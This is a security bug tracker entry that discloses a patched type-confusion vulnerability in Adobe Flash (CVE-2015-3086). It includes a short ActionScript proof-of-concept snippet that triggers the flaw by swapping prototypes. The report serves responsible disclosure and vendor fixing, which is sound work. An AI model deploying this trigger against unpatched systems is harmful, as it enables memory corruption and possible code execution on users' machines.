301 - Adobe Flash: Normal Check Should Verify that UserData and Destructor are null - project-zero

Starred by 2 users

Status:	Fixed
Owner:	█ cevans@google.com Email to this user bounced
Closed:	May 2015
Cc:	project-...@google.com
Finder-natashenka Deadline-90 Id-3530 Fixed-2015-May-12 CVE-2015-3086 Reported-2015-Mar-26 CCProjectZeroMembers Product-Flash Severity-High Vendor-Adobe

Adobe Flash: Normal Check Should Verify that UserData and Destructor are null

Project Member Reported by natashenka@google.com, Mar 26 2015

Back to list

When an object is verified to be of type Normal, it should also be verified to have a null user data and desctructor. Otherwise, there are some paths that could allow type confusion, for example:

	var n = new NetConnection();
	this.__proto__ = n;
	var y;
	trace(y);
	this.connect(y);
	this.__proto__ = {};
	this.__proto__.__constructor__ = String;
	super("test");
	trace(this);

In this case, the NetConnection object passes the normal check in the String constructor, because the object is of type normal and is not a function. But it still has a user data and destructor set, which cause type confusion when the String object is destroyed. PoC code and swf attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

mysubclass.as
531 bytes Download

super2.fla
5.4 KB Download

super2.swf
989 bytes Download

Comment 1 by cevans@google.com, Mar 27 2015

Labels: Id-3530

Comment 2 by cevans@google.com, May 7 2015

Labels: CVE-2015-3086

Comment 3 by cevans@google.com, May 12 2015

Labels: Fixed-2015-May-12
Status: Fixed

https://helpx.adobe.com/security/products/flash-player/apsb15-09.html

Project Member Comment 4 by natashenka@google.com, May 28 2015

Labels: -Restrict-View-Commit

► Sign in to add a comment